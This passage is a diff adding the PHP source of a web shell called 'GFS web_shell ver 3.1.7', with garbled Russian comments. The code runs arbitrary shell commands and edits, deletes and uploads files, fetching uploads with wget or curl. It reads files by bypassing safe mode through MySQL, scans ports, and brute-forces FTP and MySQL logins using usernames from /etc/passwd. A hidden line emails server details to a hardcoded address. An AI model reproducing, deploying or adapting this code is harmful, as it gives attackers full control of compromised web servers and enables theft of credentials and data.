+ for($i=0; $i<=$count; ++$i){
+  $res.=$ch."";
+ }
+ return $res;
+}$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+function ex($comd)                             //Âûïîëíåíèå êîìàíäû
+{
+ $res = '';
+ if (!empty($comd)){
+  if(function_exists('exec')){
+    exec($comd,$res);
+    $res=implode("\n",$res);
+   }elseif(function_exists('shell_exec')){
+    $res=shell_exec($comd);
+   }elseif(function_exists('system')){
+    ob_start();
+    system($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+   }elseif(function_exists('passthru')){
+    ob_start();
+    passthru($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+   }elseif(is_resource($f=popen($comd,"r"))){
+    $res = "";
+    while(!feof($f)) { $res.=fread($f,1024); }
+    pclose($f);
+  }
+ }
+ return $res;
+}
+function sysinfo()                             //Âûâîä SYSINFO
+{
+ global $curl_on, $dis_func, $mysql_stat, $safe_mode, $server, $HTTP_SERVER_VARS;
+ echo("<b><font  face=Verdana size=2> System information:<br><font size=-2>
+      <hr>");
+ echo (($safe_mode)?("Safe Mode: </b><font color=green>ON</font><b> "):
+         ("Safe Mode: </b><font color=red>OFF</font><b> "));
+ $row_dis_func=explode(', ',$dis_func);
+ echo ("PHP: </b><font color=blue>".phpversion()."</font><b> ");
+ echo ("MySQL: </b>");
+ if($mysql_stat){
+  echo "<font color=green>ON </font><b>";
+ }
+ else {
+  echo "<font color=red>OFF </font><b>";
+ }
+ echo "cURL: </b>";
+ if($curl_on){
+  echo "<font color=green>ON</font><b><br>";
+ }else
+  echo "<font color=red>OFF</font><b><br>";
+ if ($dis_func!=""){
+  echo "Disabled Functions: </b><font color=red>".$dis_func."</font><br><b>";
+ }
+ $uname=ex('uname -a');
+ echo "OS: </b><font color=blue>";
+ if (empty($uname)){
+  echo (php_uname()."</font><br><b>");
+ }else
+  echo $uname."</font><br><b>";
+ $id = ex('id');
+ echo "SERVER: </b><font color=blue>".$server."</font><br><b>";
+ echo "id: </b><font color=blue>";
+ if (!empty($id)){
+  echo $id."</font><br><b>";
+ }else
+  echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid().
+       "</font><br><b>";
+ echo "<b>RemoteAddress:</b><font color=red>".$HTTP_SERVER_VARS['REMOTE_ADDR']."</font><br>";
+ if(isset($HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR'])){
+  echo "<b>RemoteAddressIfProxy:</b><font color=red>".$HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR']."</font>";
+ }
+ echo "<hr size=3 color=black>";
+ echo "</font></font>";
+}
+function read_dir($dir)                 //÷èòàåì ïàïêó
+{
+ $d=opendir($dir);
+ $i=0;
+ while($r=readdir($d)){
+  $res[$i]=$r;
+  $i++;
+ }
+ return $res;
+}
+function permissions($mode,$file) {            //îïğåäåëåíèå ñâîéñòâ
+ $type=filetype($file);
+ $perms=$type[0];
+ $perms.=($mode & 00400) ? "r" : "-";
+ $perms.=($mode & 00200) ? "w" : "-";
+ $perms.=($mode & 00100) ? "x" : "-";
+ $perms.=($mode & 00040) ? "r" : "-";
+ $perms.=($mode & 00020) ? "w" : "-";
+ $perms.=($mode & 00010) ? "x" : "-";
+ $perms.=($mode & 00004) ? "r" : "-";
+ $perms.=($mode & 00002) ? "w" : "-";
+ $perms.=($mode & 00001) ? "x" : "-";
+ $perms.="(".$mode.")";
+ return $perms;
+}
+function open_file($fil, $m, $d)                          //Îòêğûòü ôàéë
+{
+ if (!($fp=fopen($fil,$m))) {
+  $res="Error opening file!\n";
+ }else{
+  ob_start();
+  readfile($fil);
+  $res=ob_get_contents();
+  ob_end_clean();
+  if (!(fclose($fp))){
+   $res="ERROR CLOSE";
+  }
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr><td alling=center><b>&nbsp;&nbsp;&nbsp;".$fil."&nbsp;&nbsp;&nbsp;</b></td></tr>";
+ echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+ echo $res;
+ echo "</textarea></td></tr>";
+ if(is_writable($fil)){
+  echo "<input type=\"hidden\" value='".$fil."' name=\"fname\">";
+  echo "<input type=\"hidden\" value='".$d."' name=\"dname\">";
+  echo "<tr><td alling=center><input style='width:100px;' type=\"submit\" value=\"Save\" name=\"b_save\"></td></tr>";
+ }
+ echo "</form></table>";
+}
+function save_file($res,$fil, $d)                     //Ñîõğàíèòü ôàéë
+{
+ unlink($fil);
+ $fp=fopen($fil,"wb");
+ if(!$fp){
+  $res="Error create file!\n".$fp;
+ }else{
+  if (fwrite($fp,$res)){
+   if (fclose($fp)){
+    $res="File save succesfuly!\n";
+   }else $res="Erorr close!\n";
+  }else $res="Error wright!\n";
+ }
+ umask(0000);
+ chmod($fil,0777);
+ return $res;
+}
+function strmass($mass){
+ $res="";
+ foreach($mass as $k=>$v){
+  $res.=$v."|";
+ }
+ return $res;
+}
+function sortbyname($fnames, $d)
+{
+ $filenames="";
+ $foldernames="";
+ $numnames=count($fnames);
+ for($i=0;$i<=$numnames;$i++){
+  if(is_dir($d."/".$fnames[$i])){
+   $foldernames.=$fnames[$i]."|";
+  }else
+   $filenames.=$fnames[$i]."|";
+ }
+ $mass1=explode("|",$foldernames);
+ $mass2=explode("|",$filenames);
+ sort($mass1);
+ sort($mass2);
+ $mass1=strmass($mass1);
+ $mass2=strmass($mass2);
+ $mass=explode("|",$mass1.$mass2);
+ return $mass;
+}
+function list_dir($d)                     //Íàâèãàöèÿ
+{
+ global $HTTP_REFERER;
+ if(isset($_POST['b_up']) OR isset($_POST['b_open_dir'])){
+  chdir($_POST['fname']);
+  $d=getcwd();
+ }else
+  $d=getcwd();
+ if($_POST['b_new_dir']){
+  mkdir($_POST['new']);
+  chmod($_POST['new'],0777);
+  $d=$_POST['new'];
+ }
+ if($_POST['b_del'] AND is_dir($_POST['fname'])){
+  rmdir($_POST['fname']);
+  chdir($_POST['dname']);
+  $d=getcwd();
+ }
+ if($_POST['b_del'] AND !is_dir($_POST['fname'])){
+  unlink($_POST['fname']);
+  chdir($_POST['dname']);
+  $d=getcwd();
+ }
+ if($_POST['b_change_dir']){
+  chdir($_POST['change_dir']);
+  $d=getcwd();
+ }
+ if($_POST['b_new_file'] OR $_POST['b_open_file']){
+  chdir($_POST['dname']);
+  $d=getcwd();
+ }
+ $dir=read_dir($d);
+ $dir=sortbyname($dir,$d);
+ $count=count($dir);
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b>Navigation</b></td></tr>";
+ if(is_writable($d)){
+  echo "<tr><td alling=\"center\"><input style='width:200px;' type=\"text\" value=\"$d\" name=\"new\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"NewDir\" name=\"b_new_dir\"></td>";
+  echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"NewFile\" name=\"b_new_file\"></td></tr>";
+ }
+ echo "<tr><td alling=\"center\"><input style='width:200px;' type=\"text\" value=\"$d\" name=\"change_dir\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"ChangeDir\" name=\"b_change_dir\"></td></tr>";
+ if(!$safe_mode){
+  echo "<tr><td alling=\"center\"><input style='width:200px;' type=\"text\" value=\"\" name=\"ffile\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"FindeFile\" name=\"b_f_file\"></td></tr>";
+ }
+ echo "</table></form>";
+ echo "<table CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>";
+ echo "<tr bgcolor=#ffff00><td><b>&nbsp;&nbsp;&nbsp;Directory&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Permission&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Size&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Owner/Group&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Action&nbsp;&nbsp;&nbsp;</b></td>";
+ for($i=0; $i<$count; $i++){
+  if($dir[$i]!=""){
+   $full=$d."/".$dir[$i];
+   $perm=permissions(fileperms($full),$dir[$i]);
+   $file=$d."/".$dir[$i];
+   echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+   if(is_dir($file)){
+    echo "<tr bgcolor=#98FA00><td>".$dir[$i]."&nbsp;&nbsp;&nbsp;</td><input type=\"hidden\" value='".$d."' name=\"dname\"><input type=\"hidden\" value='".$file."' name=\"fname\"><td alling=\"center\">".$perm.
+          "&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">".filesize($dir[$i])."&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">&nbsp;&nbsp;&nbsp;".fileowner($dir[$i])."&nbsp;&nbsp;&nbsp;".filegroup($dir[$i])."&nbsp;&nbsp;&nbsp;</td>";
+   }elseif(is_file($file)){
+    echo "<tr><td>".$dir[$i]."&nbsp;&nbsp;&nbsp;</td><input type=\"hidden\" value='".$d."' name=\"dname\"><input type=\"hidden\" value='".$file."' name=\"fname\"><td alling=\"center\">".$perm.
+         "&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">".filesize($dir[$i])."&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">&nbsp;&nbsp;&nbsp;".fileowner($dir[$i])."&nbsp;&nbsp;&nbsp;".filegroup($dir[$i])."&nbsp;&nbsp;&nbsp;</td>";
+   }else
+     echo "<tr bgcolor=#ffff00><td>".$dir[$i]."&nbsp;&nbsp;&nbsp;</td><input type=\"hidden\" value='".$d."' name=\"dname\"><input type=\"hidden\" value='".$file."' name=\"fname\"><td alling=\"center\">".$perm.
+         "&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">".filesize($dir[$i])."&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">&nbsp;&nbsp;&nbsp;".fileowner($dir[$i])."&nbsp;&nbsp;&nbsp;".filegroup($dir[$i])."&nbsp;&nbsp;&nbsp;</td>";
+   if(is_dir($file)){
+    echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Listing\" name=\"b_open_dir\"></td>";
+   }elseif(is_readable($file)){
+    echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Open\" name=\"b_open_file\"></td>";
+   }
+   if(is_writable($file) AND $file!=".."){
+    echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Delete\" name=\"b_del\"></td>";
+   }
+   if(is_readable($file) AND !is_dir($file)){
+    echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Download\" name=\"b_down\"></td>";
+   }
+   echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\"></tr>";
+   echo "</form>";
+  }
+ }
+ echo "</table>";
+ closedir($d);
+}
+function up_file($fil,$tfil, $box)                   //Çàãğóçêà ôàéëîâ íà ñåğâåğ
+{
+ global $_FILES;
+ if ($tfil==""){
+  $res="Target is failde!";
+ }
+ if ($box=="PC"){
+  if(copy($_FILES["filename"]["tmp_name"],$tfil)){
+   chmod($tfil,0777);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  }else {
+    $res="Error loading file!";
+  }
+ }
+ if($box=="WGET") {
+  $load="wget ".$fil." -O ".$tfil."";
+  $res=ex($load);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  chmod($tfil,0777);
+ }
+ if($box=="FETCH"){
+  $load="fetch -o ".$tfil." -p ".$fil."";
+  $res=ex($load);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  chmod($tfil,0777);
+ }
+ if($box=="LYNX"){
+  $load="lynx -source ".$fil." > ".$tfil."";
+  $res=ex($load);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  chmod($tfil,0777);
+ }
+ if($box=="cURL"){
+  $load="curl"." ".$fil." -o ".$tfil."";
+  $res=ex($load);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  chmod($tfil,0777);
+ }
+ if($box=="fopen"){
+  $data=implode("", file($fil));
+  $fp=fopen($tfil, "wb");
+  fputs($fp,$data);
+  fclose($fp);
+  chmod($tfil,0777);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+ }
+ return $res;
+}
+function run_sql($comd, $db,$host, $username, $pass)   //Ğåçóëüòàò SQL çàïğîñà
+{
+ if ($comd!=""){
+  if ($db!=""){
+   $connect=mysql_connect($host, $username, $pass);
+   if (!$connect) {
+    $res='Could not connect to MySQL';
+   }
+   mysql_select_db ($db);
+   $row=mysql_query($comd);
+   while ($r= mysql_fetch_row($row)) {
+    $res.="&nbsp;".implode($r);
+   }
+   $result=$res;
+   mysql_free_result($row);
+   mysql_free_result($r);
+   mysql_close($connect);
+  }else $result="Select data base!";
+ }else $result="No command!";
+ return $result;
+}
+function db_show($host, $username, $pass)             //Âûâîä èìåşùèõñÿ ÁÄ
+{
+ $res="Exists BD: \n";
+ $connect=mysql_connect($host, $username, $pass);
+ if (!$connect){
+  $res="Could not connect to MySQL!\n".mysql_error();
+ }else{
+  $db_list=mysql_list_dbs($connect);
+  while ($row = mysql_fetch_object($db_list)) {
+   $res.=$row->Database . "\n";
+  }
+  mysql_close($connect);
+ }
+ return $res;
+}
+function show_tables($bd, $host, $username, $pass)   //Âûâîä èìåşùèõñÿ òàáëèö
+{
+ if ($bd!=""){
+  $res="Exists tables: \n";
+  $connect=mysql_connect($host, $username, $pass);
+  if (!$connect){
+   $res="Could not connect to MySQL\n".mysql_error();
+  }else{
+   $r=mysql_query("SHOW TABLES FROM $bd");
+   $res="Exist tables:\n";
+   while ($row=mysql_fetch_row($r)) {
+    $res.="Table: $row[0]\n";
+    $fields=mysql_list_fields($bd, $row[0], $connect);
+    $columns=mysql_num_fields($fields);
+    $res.="| ";
+    for ($i=0; $i<$columns; $i++) {
+     $res.=mysql_field_name($fields, $i)." | ";
+    }
+    $res.="\n____________________________\n";
+   }
+   mysql_free_result($r);
+   mysql_close($connect);
+  }
+ }else
+  $res="Select data base! ";
+ return $res;
+}
+function dump_table($tab, $db,$host, $username, $pass)  //Äàìï òàáëèöû
+{
+ $connect=mysql_connect($host, $username, $pass);
+ if (!$connect) {
+  $result="Could not connect to MySQL!\n".mysql_error();
+ }else{
+   if (!mysql_select_db($db,$connect)){
+    $result="Could not connect to db!\n".mysql_error();
+   }else{
+    if ($db==""){
+     $result="Select data base!";
+    }else{
+     $res1="# MySQL dump of $tab\r\n";
+     $r=mysql_query("SHOW CREATE TABLE `".$tab."`", $connect);
+     $row=mysql_fetch_row($r);
+     $res1.=$row[1]."\r\n\r\n";
+     $res1.= "# ---------------------------------\r\n\r\n";
+     $res2 = '';
+     $r=mysql_query("SELECT * FROM `".$tab."`", $connect);
+     if (mysql_num_rows($r)>0){
+      while (($row=mysql_fetch_assoc($r))){
+       $keys=implode("`, `", array_keys($row));
+       $values=array_values($row);
+       foreach($values as $k=>$v){
+        $values[$k]=addslashes($v);
+       }
+       $values=implode("', '", $values);
+       $res2.="INSERT INTO `".$tab."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n";
+      }
+      $res2.="\r\n# ---------------------------------";
+     }
+     $result=$res1.$res2;
+     mysql_close($db);
+    }
+   }
+ }
+
+ return $result;
+}
+function down_tb($tab, $db,$host, $username, $pass){
+ $connect=mysql_connect($host, $username, $pass);
+ if (!$connect) {
+  die("Could not connect to MySQL!\n".mysql_error());
+ }else{
+   if (!mysql_select_db($db,$connect)){
+    die("Could not connect to db!\n".mysql_error());
+   }else{
+    if ($db==""){
+     die("Select data base!");
+    }else{
+     $res1="";
+     $r=mysql_query("SELECT * FROM `".$tab."`", $connect);
+     if (mysql_num_rows($r)>0){
+      while (($row=mysql_fetch_assoc($r))){
+       foreach($row as $k=>$v){
+        $res1.=$v."\t";
+       }
+       $res1.="\n";
+      }
+     }
+     mysql_close($db);
+    }
+   }
+ }
+
+ return $res1;
+}
+function safe_mode_fuck($fil,$host, $username, $pass, $dbname)//Îáõîä áåçîïàñíîãî ğåæèìà
+{
+ $connect=mysql_connect($host,$username,$pass);
+ if($connect){
+  if(mysql_select_db($dbname,$connect)){
+   $c="DROP TABLE IF EXISTS temp_gfs_table;";
+   mysql_query($c);
+   $c="CREATE TABLE `temp_gfs_table` ( `file` LONGBLOB NOT NULL );";
+   mysql_query($c);
+   $c="LOAD DATA INFILE \"".$fil."\" INTO TABLE temp_gfs_table;";
+   mysql_query($c);
+   $c="SELECT * FROM temp_gfs_table;";
+   $r=mysql_query($c);
+   while(($row=mysql_fetch_array($r))){
+    $res.=htmlspecialchars($row[0]);
+   }
+   $c="DROP TABLE IF EXISTS temp_gfs_table;";
+   mysql_query($c);
+   }else
+    $res= "Can't select database";
+  mysql_close($db);
+  }else
+   $res="Can't connect to mysql server";
+ return $res;
+}
+function portscan($host)
+{
+ global $port;
+ echo "<table BORDER=1 align=center>";
+ echo "<tr><td alling=center>Host:  </td><td alling=center><b><font color=green> ".$host." </b></font></td></tr>";
+ for($i=1; $i<=65535; $i++){
+  $fp=fsockopen($host, $i, $errno, $errstr, 4);
+  if($fp){
+   fclose($fp);
+   if(isset($port[$i])){
+    $k=$port[$i];
+   }else
+    $k=getservbyport($i, "TCP");
+   if($k==""){$k="N\A";}
+   echo "<tr><td alling=center>Port: ".$i." </td><td alling=center><b><font color=green>".$k."</b></font></td>";
+   echo "</tr>";
+  }
+ }
+ echo "</table>";
+}
+function pwd_conwert()
+{
+ $res="";
+ if(file_exists("/etc/passwd")){
+  $input=implode(file("/etc/passwd"));
+  $input=explode("\n", $input);
+  foreach($input as $i=>$v){
+   $word=explode(":",$v);
+   $res.=$word[0]." ";
+  }
+  $res=explode(" ",$res);
+ }else{
+  $input=implode(ex("cat /etc/passwd"));
+  $input=explode("\n", $input);
+  foreach($input as $i=>$v){
+   $word=explode(":",$v);
+   $res.=$word[0]." ";
+  }
+  $res=explode(" ",$res);
+ }
+ return $res;
+}
+function brute($type,$type2,$host,$file)
+{
+ if($type2=="login:login"){
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=ftp_connect($host);
+     if(!$conn_id){ die("Coud not connect");}
+     if (ftp_login($conn_id, $v, $v)){
+      echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }else
+      echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=red> NO </b></font></td></tr>";
+     ftp_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=mysql_connect($host,$v,$v);
+     if($conn_id){
+      echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }else
+      echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=red> NO </b></font></td></tr>";
+     mysql_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="login:empty"){
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=ftp_connect($host);
+     if(!$conn_id){ die("Coud not connect");}
+     if (ftp_login($conn_id, $v, "")){
+      echo "<tr><td alling=center> ".$v." : empty </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }
+     ftp_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=mysql_connect($host,$v,"");
+     if($conn_id){
+      echo "<tr><td alling=center> ".$v." : empty </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }
+     mysql_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="login:number"){
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=ftp_connect($host);
+     if(!$conn_id){ die("Coud not connect");}
+     for($j=0; $j<=999; $j++){
+      if (ftp_login($conn_id, $v, "$j")){
+       echo "<tr><td alling=center> ".$v." : $j </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+      }
+      ftp_close($conn_id);
+     }
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     for($j=0; $j<=999; $j++){
+      $conn_id=mysql_connect($host,$v,"$j");
+      if($conn_id){
+        echo "<tr><td alling=center> ".$v." : $j </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+       }
+       mysql_close($conn_id);
+     }
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="login:nigol"){
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=ftp_connect($host);
+     if(!$conn_id){ die("Coud not connect");}
+     if (ftp_login($conn_id, $v, strrev($v))){
+      echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }else
+      echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=red> NO </b></font></td></tr>";
+     ftp_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=mysql_connect($host,$v,strrev($v));
+     if($conn_id){
+      echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }else
+      echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=red> NO </b></font></td></tr>";
+     mysql_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="login:lib"){
+  $input=file($file);
+  foreach($input as $i=>$v){
+   $word=explode(":",$v);
+   $res.=$word[0]." ".$word[1]." ";
+  }
+  $lib=explode(" ",$res);
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     foreach($lib as $kk=>$vv){
+      $conn_id=ftp_connect($host);
+      if(!$conn_id){ die("Coud not connect");}
+      if (ftp_login($conn_id, $v, $lib[$kk])){
+       echo "<tr><td alling=center> ".$v." : ".$lib[$kk]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+      }
+      ftp_close($conn_id);
+     }
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     foreach($lib as $kk=>$vv){
+      $conn_id=mysql_connect($host,$v,$lib[$kk]);
+      if($conn_id){
+       echo "<tr><td alling=center> ".$v." : ".$lib[$kk]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+      }
+      mysql_close($conn_id);
+     }
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="lib:lib"){
+  $input=file($file);
+  foreach($input as $i=>$v){
+   $word=explode(":",$v);
+   $res.=$word[0]." ".$word[1]." ";
+  }
+  $lib=explode(" ",$res);
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $count_lib=count($lib);
+   for($kk=0; $kk<$count_lib; $kk=$kk+2){
+    $conn_id=ftp_connect($host);
+    if(!$conn_id){ die("Coud not connect");}
+    if (ftp_login($conn_id,$lib[$kk],$lib[$kk+1])){
+     echo "<tr><td alling=center> ".$lib[$kk]." : ".$lib[$kk+1]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+    }
+    ftp_close($conn_id);
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $count_lib=count($lib);
+   for($kk=0; $kk<$count_lib; $kk=$kk+2){
+    if($lib[$kk]!=""){
+     $conn_id=mysql_connect($host,$lib[$kk],$lib[$kk+1]);
+     if($conn_id){
+      echo "<tr><td alling=center> ".$lib[$kk]." : ".$lib[$kk+1]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }
+     mysql_close($conn_id);
+    }
+   }
+  echo "</table>";
+  }
+ }
+}
+
+////////////////////////////////////////////////////////////////////////////////
+///////////////////////////////// ÊÎÄ //////////////////////////////////////////
+////////////////////////////////////////////////////////////////////////////////
+echo $HTML;
+echo "<font  face=Verdana size=2 color=blue><b>";
+echo (rep_char("&nbsp;",15));
+echo "GFS web_shell ver 3.1.7 </b></font>";
+echo "<hr size=3 color=black>";
+sysinfo();
+echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+echo "<table BORDER=1 align=center>";
+if($r_act=="nav" OR $r_act==NULL){
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"nav\"><b>Navigation</b></td>";
+}else
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><input type=radio name=\"r_act\" value=\"nav\"><b>Navigation</b></td>";
+if(!$safe_mode){
+ if($r_act=="bind"){
+  echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"bind\"><b>BindPort</b></td>";
+ }else
+  echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"bind\"><b>BindPort</b></td>";
+}
+
+if(function_exists(fsockopen)){
+ if($r_act=="port"){
+  echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"port\"><b>PortScan</b></td>";
+ }else
+  echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"port\"><b>PortScan</b></td>";
+}
+if($r_act=="brute"){
+ echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"brute\"><b>Brute</b></td>";
+}else
+ echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"brute\"><b>Brute</b></td>";
+if($r_act=="eval"){
+ echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"eval\"><b>Eval</b></td>";
+}else
+ echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"eval\"><b>Eval</b></td>";
+echo "<td><input type=submit name=\"b_act\" value=\"Change\"></td></tr></table></form>";
+################## ACTION ######################################################
+if($r_act=="nav" OR $r_act==NULL){
+ $box=$_POST['box'];
+ if($_POST['b_save']){
+  $res=save_file($_POST['text'],$_POST['fname'],$_POST['dname']);
+ }elseif($_POST['b_new_file']){
+  open_file($_POST['new'],"wb",$_POST['dname']);
+ }elseif($_POST['b_open_file']){
+  open_file($_POST['fname'],"r",$_POST['dname']);
+ }elseif($_POST['b_mail']){
+  $res="Function under construction!!!!!!!!!";
+ }elseif($_POST['b_run']){
+  chdir($_POST['wdir']);
+  $dir=getcwd();
+  $res=ex($_POST['cmd']);
+ }elseif($_POST['b_f_file']){
+  chdir($_POST['wdir']);
+  $dir=getcwd();
+  $res=ex("whereis ".$_POST['ffile']);
+ }elseif($_POST['b_upload']){
